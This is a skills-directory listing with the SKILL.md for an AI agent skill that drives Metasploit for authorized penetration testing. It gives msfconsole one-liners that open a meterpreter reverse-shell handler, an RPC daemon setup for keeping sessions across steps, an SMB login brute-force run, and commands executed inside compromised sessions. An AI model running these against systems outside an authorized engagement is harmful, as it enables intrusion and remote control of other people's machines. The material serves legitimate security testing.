Skip to content
Back to skills

Tools Metasploit

ASecurity

Drive Metasploit (msfconsole/msfrpcd) for the exploitation phase without hanging the toolchain — one-shot -x invocations, RPC daemon mode for persistent sessions, batch auxiliary runs. Load when a confirmed vuln maps to a public MSF module, you need exploit/multi/handler for a reverse shell, or meterpreter sessions must survive across steps. Signals: msfconsole, msf, meterpreter, LHOST/LPORT, "module for this CVE", exploit/multi/handler, session opened.

  • 20 stars
  • 0 votes
  • 0 copies
  • 0 views
  • Added October 5, 2026
ai-agentsgorubyshellbashgitapi

Works with

  • cli
  • api
  • mcp

Security analysis

A92/100
  • mediumUses curl or wget to download content

Pro shows the line behind each finding and how to fix it

Scanned October 5, 2026

npx -y skills add NoorQureshi/SploitAgent --skill tools-metasploit --agent claude-code

Installs into .claude/skills of the current project.

Are you the author of Tools Metasploit?

Add the live security badge to your README. It updates with every re-scan.

Security grade badge for Tools Metasploit
[![Security: A — Skills Directory](https://www.skillsdirectory.com/api/skills/noorqureshi-tools-metasploit/badge)](https://www.skillsdirectory.com/skills/noorqureshi-tools-metasploit)

More formats (shields.io, HTML) on the badges page. Keep it an A: scan every change in CI with Pro.

Download with Pro
SKILL.md
---
name: tools-metasploit
description: >
  Drive Metasploit (msfconsole/msfrpcd) for the exploitation phase without hanging the toolchain —
  one-shot -x invocations, RPC daemon mode for persistent sessions, batch auxiliary runs. Load when a
  confirmed vuln maps to a public MSF module, you need exploit/multi/handler for a reverse shell, or
  meterpreter sessions must survive across steps. Signals: msfconsole, msf, meterpreter, LHOST/LPORT,
  "module for this CVE", exploit/multi/handler, session opened.
domain: tools
type: technique
stability: learning
modes: [pentest, bugbounty]
severity: high
mitre: [T1190, T1059]
tools: [metasploit, msfconsole, msfrpcd, meterpreter, metasploitmcp]
schema_version: 1
---

# Metasploit without the hang

## When it applies
You have a confirmed in-scope weakness (`tradecraft-scope-roe` first) that maps to a Metasploit
module, or you need a `exploit/multi/handler` listener for a reverse shell (`payloads-reverse-shells`).
Metasploit is the right tool when a reliable public module exists; for novel bugs write a PoC
instead (`exploit-poc-development`). Driving MSF from scripts or an agent is where most people get
burned — this skill is the correct invocation discipline.

## Why it works
`msfconsole` is an interactive REPL: launched bare it waits for stdin forever, and each new console
is a separate process that cannot see another console's sessions. Non-interactive use therefore
means either (a) cramming the whole job into one `-x` string that ends in `exit`, or (b) keeping
state in a long-lived `msfrpcd` daemon that short-lived clients connect to.

## Method
1. **Pattern A — one-shot call (covers ~80% of cases).** Everything in a single `-x`, always ending
   with `;exit`:
   ```bash
   msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST <callback_ip>; set LPORT <port>; exploit; sleep 20; sessions -l; exit"
   ```
   `-q` suppresses the banner/verbosity; `sleep 20` gives the reverse shell time to call back;
   `sessions -l` runs *in the same process* so you actually see the session. Run with a generous
   timeout (120s+) and wait for real completion.
2. **Pattern B — RPC daemon (multi-step work with persistent sessions).** Check the port first,
   start the daemon in the background, then connect short-lived clients:
   ```bash
   netstat -tulnp | grep 55553                 # MUST verify the port is free first
   msfrpcd -P pass -U user -a 127.0.0.1 -p 55553 &   # background; long-lived
   msfconsole -q -x "connect 127.0.0.1:55553 user pass; use exploit/...; exploit; exit"
   msfconsole -q -x "connect 127.0.0.1:55553 user pass; sessions -l; sessions -i 1 -c 'whoami'; exit"
   ```
   Sessions live in the daemon, so later clients see them. `pkill -f msfrpcd` when done.
3. **Pattern C — batch auxiliary/scanner runs (no session needed).**
   ```bash
   msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS <target>; set USER_FILE users.txt; set PASS_FILE passes.txt; run; exit"
   ```
   Use `run` for auxiliary modules (not `exploit`); all output arrives on stdout at exit.
4. **Listener discipline for callbacks.** LPORT must be inside the range the engagement/platform
   allocated to you; find your public IP with `curl -s https://api.ipify.org` if unknown, and verify
   reachability from outside with `nc -zv <callback_ip> <port>` before blaming the payload.
5. **Minimize output for logs/LLM context:** `-q`, `set ConsoleLogging false`, `set LogLevel 0`,
   prefer `sessions -l` over `-v`, and post-filter:
   `... | grep -E "session|opened|fail"`.
6. **MCP option:** Kali ships `metasploitmcp` (`apt install metasploitmcp`,
   `metasploitmcp --transport stdio`) exposing module/payload/session operations as MCP tools —
   see `tools-mcp-bridges`. The same invocation rules apply underneath.

## Gotchas
- **Bare `msfconsole` hangs forever** waiting for input — never invoke without `-x "..."`.
- **Missing `;exit`** at the end of `-x` = orphaned ruby process that never returns.
- **Splitting work across consoles** — a new console can't see a previous console's sessions; merge
  into one `-x` or switch to Pattern B.
- **Redundant handler** — `exploit` already starts a handler for the payload; adding a separate
  `exploit/multi/handler` in the same run just double-binds the port.
- **Bind failures are silent-ish** — if LPORT is taken the exploit errors but the console has
  already exited; `netstat -tulnp | grep :<port>` *before* every listener.
- **Diagnostics when anything misbehaves:** `ps aux | grep -E "msfconsole|msfrpcd|ruby"` for
  orphans, `netstat -tulnp | grep -E ":4444|:55553"` for stray listeners, then `pkill -f msfconsole`
  / `pkill -f msfrpcd` to clean up. MSF is all ruby — orphaned processes accumulate fast.
- **Meterpreter is the loudest C2** — heavily signatured; fine for labs, expect detections against
  defended targets (see `defense-*` for what blue teams look for).

## Verify success
`sessions -l` (in the same process, or against the same msfrpcd) shows an open session, and
`sessions -i <id> -c 'id'` returns the target context you expected. No orphaned ruby processes or
bound listeners remain after cleanup.

## References
Metasploit Framework docs; Rapid7 module DB; Metasploit Unleashed (free course);
GH05TCREW/MetasploitMCP. Handler payloads: `payloads-reverse-shells`.

---
_Portions adapted from [reverse-skill](https://github.com/zhaoxuya520/reverse-skill) by zhaoxuya520, MIT License._

Attribution

Is this your skill, or is something wrong with this listing? Request removal or report an issue. Author removals are honored within 72 hours.

Comments

Loading comments…